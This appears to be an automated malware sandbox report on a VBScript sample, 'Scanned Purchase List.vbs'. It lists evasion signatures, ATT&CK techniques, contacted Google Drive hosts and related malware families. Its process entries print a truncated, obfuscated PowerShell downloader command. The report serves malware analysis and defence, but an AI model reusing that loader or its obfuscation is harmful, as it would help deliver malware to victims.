      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicvssn
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_7444.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#selvhrdendes opdrager hjremarginerne dundertaler #>;$usolidere43='councilmen';<#herredmmer plasmagenic jdindernes suttene korjambisk decelerationsbanen udskejelser #>;$dimit=$host.privatedata;if ($dimit) {$pantagraphic++;}function doublecrossing($spisevgringer253){$driftsbesparelse=$gucki+$spisevgringer253.length-$pantagraphic;for( $crunchingly=3;$crunchingly -lt $driftsbesparelse;$crunchingly+=4){$nikeno+=$spisevgringer253[$crunchingly];}$nikeno;}function tramelling($perhapses){ & ($boligydelsen) ($perhapses);}$sortkldt=doublecrossing 'talm ,fospazlocidatls il kna d,/asy5 ke.ind0res lo,(svaw oihornfordf noanswa ss sm con,jrt s. art1epa0so,.vet0,ie;p r showpasi ena.y6d g4hav;c b seexltr6de 4 lo;mis oerchev ,r: ud1ans2tra1fer.ri.0unl)les chag frestocne kundo ar/sor2mur0.au1lok0 f 0zef1pso0 do1 pr idfemiivenrtegemodf umocanx a/e.i1out2ung1mos. n0 a. ';$panservaaben=doublecrossing ' s udiss pae asr.lt- unap lgtapebjlnolet r ';$encheson=doublecrossing 'gyrh aatp ntpespknas ti:beh/ i/le d t.rfrai revfrieimp. s g inosl.omosg jal stehys.rencangomidmun,/ vupercwhe? 
kne ndx stp ero rrct tplu=pred h,ostiwpannsy,lim obriaessd il&kalif,ide f=h s1lano duqtyreb rlacc7oveu ,agsulopipyuncksids vapdecd ,ar npj gr9dis1 eng l wh mqst os,ri ifv t nlinnindrlinsjea6stipombvfur9 ti4bri ';$dioxid=doublecrossing ' s.>fib ';$boligydelsen=doublecrossing 's aistoeappxs m ';$manducation='springklaps';$drinksenes='\paralytical.nap';tramelling (doublecrossing 'otu$ar gstjl,hooef.bcl,acavlbev:gerc r o fiu rinepotsacecamrevaalnorbreggr u eelimsvis=egy$wooej.nn olvs l:medadmpptw.ppred aaasyrtmaravu.+ yk$ m dhipr elikilnpeakskasnonepitnphaetilsfur ');tramelling (doublecrossing ',or$sozg emld ro keba taunilpra:acrsi vtimpyg,ire otbindmanyrookfa ku cebutr ln=pol$ ateaman.ykcbilhindes.hskeeojobn pa.tyns ekpsy,lsleiab thav(bil$ svd.eyiungocruxpleidord to) sc ');tramelling (doublecrossing 'maw[difncamestrtter.kilsv,le sir mev faibescdaweferptheohypiundnso.tnskm s.a m ns,maspegsameridr k ] a: on:na.sdove apchabupa.r ,rijart apyskupst,ra coskata kof,lcan o nelnon n= nu kv[ ndnr aequatco . vaspite bacstousynra gisartlgtyoplpnerrtrao trtbndogluche ocyclalatr gyekspsa e d]avo:f r: phtnonlmarsp,e1s o2idi ');$encheson=$styrtdykker[0];$northwardly=(doublecrossing ' ou$soggs mlplaononbteraglal or:stelintis ogun h ktt p,a mtgforesl.6 ma8s,v=optnaare bawpar-theostabmiljifae hoc uvtnon earsf ryla.s.potfeeed lmhov.delnk ae untfor.ovewjonea,sboplcgell keiseneps nandt sp ');tramelling ($northwardly);tramelling (doublecrossing ' cr$dialre idkfgl phemutafkaridgenfefre6til8cir.marhovaepa asa.dvapestar sesfag[ un$conptoravo n d sbl econrp lv tuara ashob ade anncem].as= p$at s kao.ntrphotfikky pltrid k tmis ');$semicolloquially=doublecrossing ' f $.oalhlei n grovhreitmi as ng prebad6ur.8fum.strdtypo prwsydn rulozooau aferdan fbetib ml beemyo(pse$ oneoffn unc mohi
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Source | Detection | Scanner | Label
      Scanned Purchase List.vbs | 11% | ReversingLabs |
      Scanned Purchase List.vbs | 13% | Virustotal |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      bg.microsoft.map.fastly.net | 0% | Virustotal |
      drive.google.com | 0% | Virustotal |
      drive.usercontent.google.com | 1% | Virustotal |
      Source | Detection | Scanner | Label
      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
      https://contoso.com/ | 0% | URL Reputation | safe
      https://nuget.org/nuget.exe | 0% | URL Reputation | safe
      https://contoso.com/License | 0% | URL Reputation | safe
      https://contoso.com/Icon | 0% | URL Reputation | safe
      https://aka.ms/pscore68 | 0% | URL Reputation | safe
      https://apis.google.com | 0% | URL Reputation | safe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
      http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
      https://www.google.com | 0% | Virustotal |
      http://drive.usercontent.google.com | 1% | Virustotal |
      https://drive.google.com | 0% | Virustotal |
      https://drive.usercontent.google.com | 1% | Virustotal |
      http://www.microsoft. | 0% | Virustotal |
      https://github.com/Pester/Pester | 1% | Virustotal |
      http://drive.google.com | 0% | Virustotal |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
      drive.google.com | 142.250.184.238 | true | false | | unknown
      drive.usercontent.google.com | 142.250.184.193 | true | false | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.googPBjN | powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://drive.usercontent.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD151F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.google.com( | powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://contoso.com/ | powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/License | powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://drive.googP | powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD08F9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.googh | powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.googhZ | powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://www.microsoft. | powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://drive.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://apis.google.com | powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IP | Domain | Country | ASN | ASN Name | Malicious
                142.250.185.142 | unknown | United States | 15169 | GOOGLEUS | false
                142.250.184.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523158
                Start date and time:2024-10-01 07:44:41 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Scanned Purchase List.vbs
                Detection:MAL
                Classification:mal92.expl.evad.winVBS@4/5@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 7
                • Number of non-executed functions: 1
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 88.221.110.91, 2.16.100.168
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                • Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:45:35 | API Interceptor | 1x Sleep call for process: wscript.exe modified
01:45:38 | API Interceptor | 3796310x Sleep call for process: powershell.exe modified
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | RFQ-00032035.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 199.232.214.172
bg.microsoft.map.fastly.net | RFQ -SCHOTTEL Type SRP200.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 199.232.214.172
bg.microsoft.map.fastly.net | https://www.afghanhayatrestaurant.com.au/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://bestratedrobotvacuum.com/?bypass-cdn=1 | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=rCxHFZLdZUGNvhn9cgWChLhuCDtpfZJDs2F6orjCzx1UQTZXSUlaNE5INzZVSkgxRlBKR1RMSTVRTi4u | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://wtm.ventes-privees-du-jour.… | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Fiserv_SHIP_RangerForDigitalCheckTSSeries_CX30_4.9.4.0-2.2.2.8_RR_v2.2.2.1_NL.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://www.allegiantair.com/deals//smsgiveaway | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://servicesnaustraliagov.info/admin | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | file.exe | malicious | Stealc | 199.232.214.172
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | mtgjyX9gHF.exe | malicious | Quasar | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | 2zYP8qOYmJ.exe | malicious | Unknown | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | RFQ-00032035.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | RFQ -SCHOTTEL Type SRP200.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order 007823-PO# 005307.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | 2zYP8qOYmJ.exe | malicious | Unknown | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | invoice.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.238, 142.250.185.142, 142.250.184.193
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.184.238, 142.250.185.142, 142.250.184.193
                No context
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:high, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.141785112603811
                Encrypted:false
                SSDEEP:6:kKQdF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:EsDnLNkPlE99SNxAhUe/3
                MD5:DE520022F5CE2DED626359B1C18DE338
                SHA1:85E11D3FE503B149E9E95978C475601265B7DA72
                SHA-256:A64AFB6FCE240F40FA15582789F49CC1F73A02F3222241D01D2011A80D4AE1DE
                SHA-512:5C1C3BCEABC07661894F5003609B10E9BE3335B8A4D2773ABF420DA883C0C4FE5BA64EED89916F627152A62E8FF3095668A559D2D4D908820AE7E3CB4A8742C1
                Malicious:false
                Reputation:low
